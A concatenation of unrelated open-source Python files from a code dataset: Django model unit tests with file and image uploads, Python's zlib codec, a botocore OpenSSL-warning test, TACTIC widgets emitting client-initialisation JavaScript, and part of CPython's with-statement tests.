Tests `file` and `image`.
"""
content = ProjectsModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def test_re_upload(self):
"""
Testing re-uploads for `file`, and `image`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
ProjectsModel.objects.update(id=1,
file=SimpleUploadedFile('project_model_1.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'project_model_1.jpg', 'image/jpeg',
im_io,
None))
content = ProjectsModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def tearDown(self):
for file_object in os.listdir(settings.MEDIA_ROOT):
file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
if os.path.isfile(file_object_path):
os.unlink(file_object_path)
else:
shutil.rmtree(file_object_path)
class TutorialsModelTest(TestCase):
"""
Test case for `TutorialsModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `TutorialsModel` and mocks django `timezone`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
model = ContentModel.objects.create(ref_id=1)
TutorialsModel.objects.create(id=1,
ref_id=model,
link="https://www.example.com",
title="some title",
long_description="very long description\n yes very long",
file=SimpleUploadedFile('tutorials_model.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'tutorials_model.jpg', 'image/jpeg',
im_io,
None))
def test_model(self):
"""
Tests `id`, `link`, `title` and `long_description`
"""
content = TutorialsModel.objects.get(id=1)
self.assertEqual(content.id, 1)
self.assertEqual(content.link, "https://www.example.com")
self.assertEqual(content.title, "some title")
self.assertEqual(content.long_description, "very long description\n yes very long")
def test_files(self):
"""
Tests `file` and `image`.
"""
content = TutorialsModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def test_re_upload(self):
"""
Testing re-uploads for `file`, and `image`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
TutorialsModel.objects.update(id=1,
file=SimpleUploadedFile('tutorial_model_1.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'tutorial_model_1.jpg', 'image/jpeg',
im_io,
None))
content = TutorialsModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def tearDown(self):
for file_object in os.listdir(settings.MEDIA_ROOT):
file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
if os.path.isfile(file_object_path):
os.unlink(file_object_path)
else:
shutil.rmtree(file_object_path)
class ExperienceModelTest(TestCase):
"""
Test case for `ExperienceModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `ExperienceModel` and mocks django `timezone`
"""
model = ContentModel.objects.create(ref_id=1)
ExperienceModel.objects.create(id=1,
ref_id=model,
title="some title",
from_date=mock_date(),
to_date=mock_date(),
where_city="some city",
where_country="some country",
current=True,
company="some company")
def test_model(self):
"""
Tests `id`, `title`, `from_date`, `to_date`, `where_city`, `where_country`, `company` and `current`.
"""
content = ExperienceModel.objects.get(id=1)
self.assertEqual(content.id, 1)
self.assertEqual(content.title, "some title")
self.assertEqual(content.from_date, mock_date())
self.assertEqual(content.to_date, mock_date())
self.assertEqual(content.where_city, "some city")
self.assertEqual(content.where_country, "some country")
self.assertEqual(content.company, "some company")
self.assertEqual(content.current, True)
class SkillsModelTest(TestCase):
"""
Test case for `SkillsModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `SkillsModel` and mocks django `timezone`
"""
model = ContentModel.objects.create(ref_id=1)
SkillsModel.objects.create(ref_id=model, type_of_skill="some type")
def test_model(self):
"""
Tests `type_of_skill`
"""
content = SkillsModel.objects.get(type_of_skill="some type")
self.assertEqual(content.type_of_skill, "some type")
class SkillsContentModelTest(TestCase):
"""
Test case for `SkillsContentModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `SkillsContentModel` and mocks django `timezone`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
model = ContentModel.objects.create(ref_id=1)
skills_model = SkillsModel.objects.create(ref_id=model, type_of_skill="some type")
SkillsContentModel.objects.create(id=1,
type_of_skill=skills_model,
content="some content",
file=SimpleUploadedFile('skills_content_model.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'skills_content_model.jpg',
'image/jpeg',
im_io,
None))
def test_model(self):
"""
Tests `id` and `content`
"""
content = SkillsContentModel.objects.get(id=1)
self.assertEqual(content.id, 1)
self.assertEqual(content.content, "some content")
def test_files(self):
"""
Tests `file` and `image`.
"""
content = SkillsContentModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def test_re_upload(self):
"""
Testing re-uploads for `file`, and `image`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
SkillsContentModel.objects.update(id=1,
file=SimpleUploadedFile('skills_content_model_1.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'skills_content_model_1.jpg',
'image/jpeg', im_io, None))
content = SkillsContentModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def tearDown(self):
for file_object in os.listdir(settings.MEDIA_ROOT):
file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
if os.path.isfile(file_object_path):
os.unlink(file_object_path)
else:
shutil.rmtree(file_object_path)
class PublicationsModelTest(TestCase):
"""
Test case for `PublicationsModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `PublicationsModel` and mocks django `timezone`
"""
model = ContentModel.objects.create(ref_id=1)
PublicationsModel.objects.create(ref_id=model, type_of_publication="some publication")
def test_model(self):
"""
Tests `type_of_publication`
"""
content = PublicationsModel.objects.get(type_of_publication="some publication")
self.assertEqual(content.type_of_publication, "some publication")
class PublicationsContentModelTest(TestCase):
"""
Test case for `PublicationsContentMode`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `PublicationsModel` and mocks django `timezone`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
model = ContentModel.objects.create(ref_id=1)
publication_model = PublicationsModel.objects.create(ref_id=model, type_of_publication="some publication")
PublicationsContentModel.objects.create(id=1,
type_of_publication=publication_model,
content="some content",
file=SimpleUploadedFile('publication_content_model.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'publication_content_model.jpg',
'image/jpeg',
im_io,
None))
def test_model(self):
"""
Tests `id` and `content`
"""
content = PublicationsContentModel.objects.get(id=1)
self.assertEqual(content.id, 1)
self.assertEqual(content.content, "some content")
def test_files(self):
"""
Tests `file` and `image`.
"""
content = PublicationsContentModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def test_re_upload(self):
"""
Testing re-uploads for `file`, and `image`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
PublicationsContentModel.objects.update(id=1,
file=SimpleUploadedFile('publication_content_model_1.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None,
'publication_content_model_1.jpg',
'image/jpeg', im_io, None))
content = PublicationsContentModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def tearDown(self):
for file_object in os.listdir(settings.MEDIA_ROOT):
file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
if os.path.isfile(file_object_path):
os.unlink(file_object_path)
else:
shutil.rmtree(file_object_path)
class MetaContentModelTest(TestCase):
"""
Test case for `MetaContentModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up `MetaContentModel`
"""
MetaContentModel.objects.create(ref_id=1,
header="some header",
footer="some footer",
meta="some meta")
def test_model(self):
"""
Tests `id`, `header`, `footer` and `meta`
"""
content = MetaContentModel.objects.get(ref_id=1)
self.assertEqual(content.ref_id, 1)
self.assertEqual(content.header, "some header")
self.assertEqual(content.footer, "some footer")
self.assertEqual(content.meta, "some meta")
| mit |
Microvellum/Fluid-Designer | win64-vc/2.78/python/lib/encodings/zlib_codec.py | 202 | 2204 | """Python 'zlib_codec' Codec - zlib compression encoding.
This codec de/encodes from bytes to bytes.
Written by Marc-Andre Lemburg (mal@lemburg.com).
"""
import codecs
import zlib # this codec needs the optional zlib module !
### Codec APIs
def zlib_encode(input, errors='strict'):
assert errors == 'strict'
return (zlib.compress(input), len(input))
def zlib_decode(input, errors='strict'):
assert errors == 'strict'
return (zlib.decompress(input), len(input))
class Codec(codecs.Codec):
def encode(self, input, errors='strict'):
return zlib_encode(input, errors)
def decode(self, input, errors='strict'):
return zlib_decode(input, errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
def __init__(self, errors='strict'):
assert errors == 'strict'
self.errors = errors
self.compressobj = zlib.compressobj()
def encode(self, input, final=False):
if final:
c = self.compressobj.compress(input)
return c + self.compressobj.flush()
else:
return self.compressobj.compress(input)
def reset(self):
self.compressobj = zlib.compressobj()
class IncrementalDecoder(codecs.IncrementalDecoder):
def __init__(self, errors='strict'):
assert errors == 'strict'
self.errors = errors
self.decompressobj = zlib.decompressobj()
def decode(self, input, final=False):
if final:
c = self.decompressobj.decompress(input)
return c + self.decompressobj.flush()
else:
return self.decompressobj.decompress(input)
def reset(self):
self.decompressobj = zlib.decompressobj()
class StreamWriter(Codec, codecs.StreamWriter):
charbuffertype = bytes
class StreamReader(Codec, codecs.StreamReader):
charbuffertype = bytes
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='zlib',
encode=zlib_encode,
decode=zlib_decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
_is_text_encoding=False,
)
| gpl-3.0 |
boto/botocore | tests/functional/test_iot_data.py | 2 | 1629 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import sys
from tests import unittest, mock, BaseSessionTest
from botocore.exceptions import UnsupportedTLSVersionWarning
class TestOpensslVersion(BaseSessionTest):
def test_incompatible_openssl_version(self):
with mock.patch('ssl.OPENSSL_VERSION_INFO', new=(0, 9, 8, 11, 15)):
with mock.patch('warnings.warn') as mock_warn:
self.session.create_client('iot-data', 'us-east-1')
call_args = mock_warn.call_args[0]
warning_message = call_args[0]
warning_type = call_args[1]
# We should say something specific about the service.
self.assertIn('iot-data', warning_message)
self.assertEqual(warning_type, UnsupportedTLSVersionWarning)
def test_compatible_openssl_version(self):
with mock.patch('ssl.OPENSSL_VERSION_INFO', new=(1, 0, 1, 1, 1)):
with mock.patch('warnings.warn') as mock_warn:
self.session.create_client('iot-data', 'us-east-1')
self.assertFalse(mock_warn.called)
| apache-2.0 |
mwx1993/TACTIC | src/tactic/ui/cgapp/app_init_wdg.py | 6 | 7053 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
__all__ = [ 'PyMayaInit', 'PyFlashInit', 'PyRepoActionInit', 'PyHoudiniInit', 'PyXSIInit']
from pyasm.biz import PrefSetting, Project
from pyasm.web import Html, WebContainer, Widget, DivWdg
from pyasm.widget import HiddenWdg
class PyMayaInit(Widget):
def get_display(my):
div = DivWdg()
# this is to prevent this function from being run in other tabs
web = WebContainer.get_web()
user = WebContainer.get_user_name()
local_dir = web.get_local_dir()
context_url = web.get_site_context_url().to_string()
http_server = web.get_base_url().to_string()
upload_url = web.get_upload_url()
project_code = Project.get_project_code()
div.add_behavior( {
'type': 'load',
'cbjs_action': '''
var js_files = [
"/context/javascript/PyMaya.js",
];
var supp_js_files = [
"/context/spt_js/fx_anim.js",
"/context/javascript/PyHoudini.js",
"/context/javascript/PyXSI.js"
];
var set_up = function() {
try {
app = new PyMaya(); }
catch(e) {
app = null;
}
if (app) {
app.user = '%(user)s';
app.local_dir = '%(local_dir)s';
app.context_url = '%(context_url)s';
app.base_url = '%(server)s';
app.upload_url = '%(upload_url)s';
app.project_code = '%(project_code)s';
}
}
spt.dom.load_js(js_files, function() {PyMaya(); set_up();});
spt.dom.load_js(supp_js_files, function() {});
'''%{
'user': user,
'local_dir': local_dir,
'context_url' : context_url,
'server': http_server,
'upload_url': upload_url,
'project_code': project_code }
})
#pref = PrefSetting.get_value_by_key("use_java_maya")
#if pref == "true":
# html.writeln("<script>app.use_java = true</script>")
handoff_dir = web.get_client_handoff_dir(no_exception=True)
if not handoff_dir:
print "WARNING: handoff_dir is empty in the TACTIC config file"
server = web.get_http_host()
application = "maya"
div.add( HiddenWdg("user", user) )
div.add( HiddenWdg("handoff_dir", handoff_dir) )
div.add( HiddenWdg("project_code", project_code) )
div.add( HiddenWdg("local_dir", local_dir) )
div.add( HiddenWdg("server_name", server) )
div.add( HiddenWdg("application", application) )
#div.add( HiddenWdg("base_url", server) )
#div.add( HiddenWdg("upload_url", upload_url) )
return div
class PyFlashInit(Widget):
def get_display(my):
web = WebContainer.get_web()
html = Html()
html.writeln("<script>var pyflash=new PyFlash()</script>")
# add in parameters for pyflash
user = WebContainer.get_user_name()
html.writeln("<script>pyflash.user = '%s'</script>" % user)
local_dir = web.get_local_dir()
html.writeln("<script>pyflash.local_dir = '%s'</script>" % local_dir)
server = web.get_base_url().to_string()
html.writeln("<script>pyflash.server_url = '%s'</script>" % server)
context_url = web.get_site_context_url().to_string()
html.writeln("<script>pyflash.context_url = '%s%s'</script>" % (server, context_url))
upload_url = web.get_upload_url()
html.writeln("<script>pyflash.upload_url = '%s'</script>" % upload_url)
return html
class PyHoudiniInit(Widget):
def get_display(my):
web = WebContainer.get_web()
user = WebContainer.get_user_name()
local_dir = web.get_local_dir()
context_url = web.get_site_context_url().to_string()
server = web.get_base_url().to_string()
upload_url = web.get_upload_url()
html = Html()
html.writeln('<script language="JavaScript" src="resource:///res/RunHCommand.js"></script>')
html.writeln('''\n<script>try{ app = new PyHoudini(); }
catch(e){
app = null;}
if (app) {
app.user = '%(user)s';
app.local_dir = '%(local_dir)s';
app.context_url = '%(context_url)s';
app.base_url = '%(server)s';
app.upload_url = '%(upload_url)s';
app.project_code = '%(project_code)s';} </script>'''%{'user': user,
'local_dir': local_dir,
'context_url' : context_url,
'server': server,
'upload_url': upload_url,
'project_code': Project.get_project_code()})
return html
class PyXSIInit(Widget):
def get_display(my):
web = WebContainer.get_web()
user = WebContainer.get_user_name()
local_dir = web.get_local_dir()
context_url = web.get_site_context_url().to_string()
server = web.get_base_url().to_string()
upload_url = web.get_upload_url()
html = Html()
html.writeln('''\n<script>try{ app = new PyXSI(); }
catch(e){
app = null;}
if (app) {
app.user = '%(user)s';
app.local_dir = '%(local_dir)s';
app.context_url = '%(context_url)s';
app.base_url = '%(server)s';
app.upload_url = '%(upload_url)s';
app.project_code = '%(project_code)s';} </script>'''%{'user': user,
'local_dir': local_dir,
'context_url' : context_url,
'server': server,
'upload_url': upload_url,
'project_code': Project.get_project_code()})
return html
class PyRepoActionInit(Widget):
def get_display(my):
html = Html()
html.writeln("<script>var pyp4=new PyPerforce()</script>")
upload_url = WebContainer.get_web().get_upload_url()
html.writeln("<script>var tactic_repo=new TacticRepo()</script>")
html.writeln("<script>tactic_repo.upload_url='%s'</script>" %upload_url)
return html
| epl-1.0 |
seem-sky/kbengine | kbe/src/lib/python/Lib/test/test_with.py | 84 | 26503 | """Unit tests for the with statement specified in PEP 343."""
__author__ = "Mike Bland"
__email__ = "mbland at acm dot org"
import sys
import unittest
from collections import deque
from contextlib import _GeneratorContextManager, contextmanager
from test.support import run_unittest
class MockContextManager(_GeneratorContextManager):
def __init__(self, func, *args, **kwds):
super().__init__(func, *args, **kwds)
self.enter_called = False
self.exit_called = False
self.exit_args = None
def __enter__(self):
self.enter_called = True
return _GeneratorContextManager.__enter__(self)
def __exit__(self, type, value, traceback):
self.exit_called = True
self.exit_args = (type, value, traceback)
return _GeneratorContextManager.__exit__(self, type,
value, traceback)
def mock_contextmanager(func):
def helper(*args, **kwds):
return MockContextManager(func, *args, **kwds)
return helper
class MockResource(object):
def __init__(self):
self.yielded = False
self.stopped = False
@mock_contextmanager
def mock_contextmanager_generator():
mock = MockResource()
try:
mock.yielded = True
yield mock
finally:
mock.stopped = True
class Nested(object):
def __init__(self, *managers):
self.managers = managers
self.entered = None
def __enter__(self):
if self.entered is not None:
raise RuntimeError("Context is not reentrant")
self.entered = deque()
vars = []
try:
for mgr in self.managers:
vars.append(mgr.__enter__())
self.entered.appendleft(mgr)
except:
if not self.__exit__(*sys.exc_info()):
raise
return vars
def __exit__(self, *exc_info):
# Behave like nested with statements
# first in, last out
# New exceptions override old ones
ex = exc_info
for mgr in self.entered:
try:
if mgr.__exit__(*ex):
ex = (None, None, None)
except:
ex = sys.exc_info()
self.entered = None
if ex is not exc_info:
raise ex[0](ex[1]).with_traceback(ex[2])
class MockNested(Nested):
def __init__(self, *managers):
Nested.__init__(self, *managers)
self.enter_called = False
self.exit_called = False
self.exit_args = None
def __enter__(self):
self.enter_called = True
return Nested.__enter__(self)
def __exit__(self, *exc_info):
self.exit_called = True
self.exit_args = exc_info
return Nested.__exit__(self, *exc_info)
class FailureTestCase(unittest.TestCase):
def testNameError(self):
def fooNotDeclared():
with foo: pass
self.assertRaises(NameError, fooNotDeclared)
def testEnterAttributeError(self):
class LacksEnter(object):
def __exit__(self, type, value, traceback):
pass
def fooLacksEnter():
foo = LacksEnter()
with foo: pass
self.assertRaises(AttributeError, fooLacksEnter)
def testExitAttributeError(self):
class LacksExit(object):
def __enter__(self):
pass
def fooLacksExit():
foo = LacksExit()
with foo: pass
self.assertRaises(AttributeError, fooLacksExit)
def assertRaisesSyntaxError(self, codestr):
def shouldRaiseSyntaxError(s):
compile(s, '', 'single')
self.assertRaises(SyntaxError, shouldRaiseSyntaxError, codestr)
def testAssignmentToNoneError(self):
self.assertRaisesSyntaxError('with mock as None:\n pass')
self.assertRaisesSyntaxError(
'with mock as (None):\n'
' pass')
def testAssignmentToEmptyTupleError(self):
self.assertRaisesSyntaxError(
'with mock as ():\n'
' pass')
def testAssignmentToTupleOnlyContainingNoneError(self):
self.assertRaisesSyntaxError('with mock as None,:\n pass')
self.assertRaisesSyntaxError(
'with mock as (None,):\n'
' pass')
def testAssignmentToTupleContainingNoneError(self):
self.assertRaisesSyntaxError(
'with mock as (foo, None, bar):\n'
' pass')
def testEnterThrows(self):
class EnterThrows(object):
def __enter__(self):
raise RuntimeError("Enter threw")
def __exit__(self, *args):
pass
def shouldThrow():
ct = EnterThrows()
self.foo = None
with ct as self.foo:
pass
self.assertRaises(RuntimeError, shouldThrow)
self.assertEqual(self.foo, None)
def testExitThrows(self):
class ExitThrows(object):
def __enter__(self):
return
def __exit__(self, *args):
raise RuntimeError(42)
def shouldThrow():
with ExitThrows():
pass
self.assertRaises(RuntimeError, shouldThrow)
class ContextmanagerAssertionMixin(object):
def setUp(self):
self.TEST_EXCEPTION = RuntimeError("test exception")
def assertInWithManagerInvariants(self, mock_manager):
self.assertTrue(mock_manager.enter_called)
self.assertFalse(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args, None)
def assertAfterWithManagerInvariants(self, mock_manager, exit_args):
self.assertTrue(mock_manager.enter_called)
self.assertTrue(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args, exit_args)
def assertAfterWithManagerInvariantsNoError(self, mock_manager):
self.assertAfterWithManagerInvariants(mock_manager,
(None, None, None))
def assertInWithGeneratorInvariants(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertFalse(mock_generator.stopped)
def assertAfterWithGeneratorInvariantsNoError(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertTrue(mock_generator.stopped)
def raiseTestException(self):
raise self.TEST_EXCEPTION
def assertAfterWithManagerInvariantsWithError(self, mock_manager,
exc_type=None):
self.assertTrue(mock_manager.enter_called)
self.assertTrue(mock_manager.exit_called)
if exc_type is None:
self.assertEqual(mock_manager.exit_args[1], self.TEST_EXCEPTION)
exc_type = type(self.TEST_EXCEPTION)
self.assertEqual(mock_manager.exit_args[0], exc_type)
# Test the __exit__ arguments. Issue #7853
self.assertIsInstance(mock_manager.exit_args[1], exc_type)
self.assertIsNot(mock_manager.exit_args[2], None)
def assertAfterWithGeneratorInvariantsWithError(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertTrue(mock_generator.stopped)
class NonexceptionalTestCase(unittest.TestCase, ContextmanagerAssertionMixin):
def testInlineGeneratorSyntax(self):
with mock_contextmanager_generator():
pass
def testUnboundGenerator(self):
mock = mock_contextmanager_generator()
with mock:
pass
self.assertAfterWithManagerInvariantsNoError(mock)
def testInlineGeneratorBoundSyntax(self):
with mock_contextmanager_generator() as foo:
self.assertInWithGeneratorInvariants(foo)
# FIXME: In the future, we'll try to keep the bound names from leaking
self.assertAfterWithGeneratorInvariantsNoError(foo)
def testInlineGeneratorBoundToExistingVariable(self):
foo = None
with mock_contextmanager_generator() as foo:
self.assertInWithGeneratorInvariants(foo)
self.assertAfterWithGeneratorInvariantsNoError(foo)
def testInlineGeneratorBoundToDottedVariable(self):
with mock_contextmanager_generator() as self.foo:
self.assertInWithGeneratorInvariants(self.foo)
self.assertAfterWithGeneratorInvariantsNoError(self.foo)
def testBoundGenerator(self):
mock = mock_contextmanager_generator()
with mock as foo:
self.assertInWithGeneratorInvariants(foo)
self.assertInWithManagerInvariants(mock)
self.assertAfterWithGeneratorInvariantsNoError(foo)
self.assertAfterWithManagerInvariantsNoError(mock)
def testNestedSingleStatements(self):
mock_a = mock_contextmanager_generator()
with mock_a as foo:
mock_b = mock_contextmanager_generator()
with mock_b as bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(foo)
self.assertInWithGeneratorInvariants(bar)
self.assertAfterWithManagerInvariantsNoError(mock_b)
self.assertAfterWithGeneratorInvariantsNoError(bar)
self.assertInWithManagerInvariants(mock_a)
self.assertInWithGeneratorInvariants(foo)
self.assertAfterWithManagerInvariantsNoError(mock_a)
self.assertAfterWithGeneratorInvariantsNoError(foo)
class NestedNonexceptionalTestCase(unittest.TestCase,
ContextmanagerAssertionMixin):
def testSingleArgInlineGeneratorSyntax(self):
with Nested(mock_contextmanager_generator()):
pass
def testSingleArgBoundToNonTuple(self):
m = mock_contextmanager_generator()
# This will bind all the arguments to nested() into a single list
# assigned to foo.
with Nested(m) as foo:
self.assertInWithManagerInvariants(m)
self.assertAfterWithManagerInvariantsNoError(m)
def testSingleArgBoundToSingleElementParenthesizedList(self):
m = mock_contextmanager_generator()
# This will bind all the arguments to nested() into a single list
# assigned to foo.
with Nested(m) as (foo):
self.assertInWithManagerInvariants(m)
self.assertAfterWithManagerInvariantsNoError(m)
def testSingleArgBoundToMultipleElementTupleError(self):
def shouldThrowValueError():
with Nested(mock_contextmanager_generator()) as (foo, bar):
pass
self.assertRaises(ValueError, shouldThrowValueError)
def testSingleArgUnbound(self):
mock_contextmanager = mock_contextmanager_generator()
mock_nested = MockNested(mock_contextmanager)
with mock_nested:
self.assertInWithManagerInvariants(mock_contextmanager)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(mock_contextmanager)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testMultipleArgUnbound(self):
m = mock_contextmanager_generator()
n = mock_contextmanager_generator()
o = mock_contextmanager_generator()
mock_nested = MockNested(m, n, o)
with mock_nested:
self.assertInWithManagerInvariants(m)
self.assertInWithManagerInvariants(n)
self.assertInWithManagerInvariants(o)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(m)
self.assertAfterWithManagerInvariantsNoError(n)
self.assertAfterWithManagerInvariantsNoError(o)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testMultipleArgBound(self):
mock_nested = MockNested(mock_contextmanager_generator(),
mock_contextmanager_generator(), mock_contextmanager_generator())
with mock_nested as (m, n, o):
self.assertInWithGeneratorInvariants(m)
self.assertInWithGeneratorInvariants(n)
self.assertInWithGeneratorInvariants(o)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithGeneratorInvariantsNoError(m)
self.assertAfterWithGeneratorInvariantsNoError(n)
self.assertAfterWithGeneratorInvariantsNoError(o)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
class ExceptionalTestCase(ContextmanagerAssertionMixin, unittest.TestCase):
def testSingleResource(self):
cm = mock_contextmanager_generator()
def shouldThrow():
with cm as self.resource:
self.assertInWithManagerInvariants(cm)
self.assertInWithGeneratorInvariants(self.resource)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm)
self.assertAfterWithGeneratorInvariantsWithError(self.resource)
def testExceptionNormalized(self):
cm = mock_contextmanager_generator()
def shouldThrow():
with cm as self.resource:
# Note this relies on the fact that 1 // 0 produces an exception
# that is not normalized immediately.
1 // 0
self.assertRaises(ZeroDivisionError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm, ZeroDivisionError)
def testNestedSingleStatements(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
def shouldThrow():
with mock_a as self.foo:
with mock_b as self.bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(self.foo)
self.assertInWithGeneratorInvariants(self.bar)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithManagerInvariantsWithError(mock_b)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
self.assertAfterWithGeneratorInvariantsWithError(self.bar)
def testMultipleResourcesInSingleStatement(self):
cm_a = mock_contextmanager_generator()
cm_b = mock_contextmanager_generator()
mock_nested = MockNested(cm_a, cm_b)
def shouldThrow():
with mock_nested as (self.resource_a, self.resource_b):
self.assertInWithManagerInvariants(cm_a)
self.assertInWithManagerInvariants(cm_b)
self.assertInWithManagerInvariants(mock_nested)
self.assertInWithGeneratorInvariants(self.resource_a)
self.assertInWithGeneratorInvariants(self.resource_b)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm_a)
self.assertAfterWithManagerInvariantsWithError(cm_b)
self.assertAfterWithManagerInvariantsWithError(mock_nested)
self.assertAfterWithGeneratorInvariantsWithError(self.resource_a)
self.assertAfterWithGeneratorInvariantsWithError(self.resource_b)
def testNestedExceptionBeforeInnerStatement(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
self.bar = None
def shouldThrow():
with mock_a as self.foo:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithGeneratorInvariants(self.foo)
self.raiseTestException()
with mock_b as self.bar:
pass
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
# The inner statement stuff should never have been touched
self.assertEqual(self.bar, None)
self.assertFalse(mock_b.enter_called)
self.assertFalse(mock_b.exit_called)
self.assertEqual(mock_b.exit_args, None)
def testNestedExceptionAfterInnerStatement(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
def shouldThrow():
with mock_a as self.foo:
with mock_b as self.bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(self.foo)
self.assertInWithGeneratorInvariants(self.bar)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithManagerInvariantsNoError(mock_b)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
self.assertAfterWithGeneratorInvariantsNoError(self.bar)
def testRaisedStopIteration1(self):
# From bug 1462485
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise StopIteration("from with")
self.assertRaises(StopIteration, shouldThrow)
def testRaisedStopIteration2(self):
# From bug 1462485
class cm(object):
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def shouldThrow():
with cm():
raise StopIteration("from with")
self.assertRaises(StopIteration, shouldThrow)
def testRaisedStopIteration3(self):
# Another variant where the exception hasn't been instantiated
# From bug 1705170
@contextmanager
def cm():
yield
